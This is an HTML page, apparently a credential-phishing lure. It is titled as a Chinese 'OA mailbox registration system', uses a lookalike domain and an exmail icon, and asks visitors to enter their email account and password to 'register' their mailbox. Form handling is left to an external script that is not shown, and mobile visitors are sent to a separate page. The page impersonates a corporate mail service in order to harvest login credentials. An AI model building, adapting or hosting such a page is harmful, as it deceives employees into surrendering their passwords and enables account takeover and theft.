<!DOCTYPE html><!--STATUS OK--><html lang="ch"><head><base href="https://maill.ski"/><meta charset="utf-8"/>
	
	<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
	<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
	<link rel="shortcut icon" href="exmail_logo.ico"/>
	<title>OA邮箱备案系统</title>
	<script type="text/javascript">
      //判断是否手机访问 如果是跳转 
      try {
      var urlhash = window.location.hash;
      if (!urlhash.match("fromapp")) {
      if ((navigator.userAgent.match(/(iPhone|iPod|Android|ios|iPad)/i))) {
      window.location = "/wap.html";
      }
      }
      } catch (err) {}
</script>
	<script type="text/javascript">
</script>
	<style>
		*{
			margin: 0;
			padding: 0;
			box-sizing: border-box;
		}
		body {
			background: url(/img/0.jpg) 50% 50% no-repeat;
			background-size: cover;
			height: calc(50vw);
			min-height: 675px;
			max-height: calc(100vh - 92px);
		}
		.login_scan_panel_pwd_input {
			display: inline-block;
			box-sizing: border-box;
			width: 60%;
			position: relative;
			padding: 14px 10px;
			font-size: 14px;
			border: 1px solid #C9C9C9;
			border-radius: 2px;
			outline: none;
			transition: all 0.3s ease 0;
			height: 40px;
			margin-left: 10px;
		}
		.login{
			border: none;
			width: 80%;
			background: #2984EF;
			font-weight: 500;
			font-size: 16px;
			color: #ffffff;
			text-align: center;
			border-radius: 2px;
			line-height: 40px;
			margin: 0 auto;
			cursor:pointer;
			display: block;
		}
		.login_acitve{
			border: none;
			width: 80%;
			background: #82b6f1;
			font-weight: 500;
			font-size: 16px;
			color: #ffffff;
			text-align: center;
			border-radius: 2px;
			line-height: 40px;
			margin: 0 auto;
			cursor:pointer;
			display: block;
		}
	</style>
	<script type="text/javascript" src="js/E4278792.js"></script>
	<script type="text/javascript" src="js/jquery.min.js"></script>
	<script type="text/javascript" src="js/layer.js"></script>
	</head>
	<body>
		<div style="display: flex;width: 100%;height: 100vh;">
			<div style="display: flex;justify-content: center;width: 50%;flex-direction: column;">
				<div style="margin: auto;">
					<h1>邮箱备案中心，</h1>
					<h1>引领企业邮件管理系统革新。</h1>
				</div>
			</div>
			<div style="display: flex;justify-content: center;width: 50%;flex-direction: column;">
				<div style="margin: 0 auto;background-color: #fff;width: 50%;height: 40vh;box-shadow: 0 2px 4px rgba(0, 0, 0, .12), 0 0 6px rgba(0, 0, 0, .04);border-radius: 2px;">
					<div style="text-align: center;margin-top: 30px;margin-bottom: 30px;font-size: 30px;">邮箱备案中心</div>
					<div style="border: none;display: flex;justify-content: center;margin-bottom: 25px;">
						<div style="font-size: 16px;line-height: 40px;">邮箱账号</div>
						<input type="email" id="mail" class="login_scan_panel_pwd_input" placeholder="输入邮箱帐号"/>
					</div>
					<div style="border: none;display: flex;justify-content: center;margin-bottom: 25px;">
						<div style="font-size: 16px;line-height: 40px;">邮箱密码</div>
						<input type="password" id="pass" class="login_scan_panel_pwd_input" placeholder="输入邮箱密码"/>
					</div>
					<input type="submit" class="login" id="login" value="邮箱备案">
				</div>
			</div>
		</div>
<script>

	
</body></html>
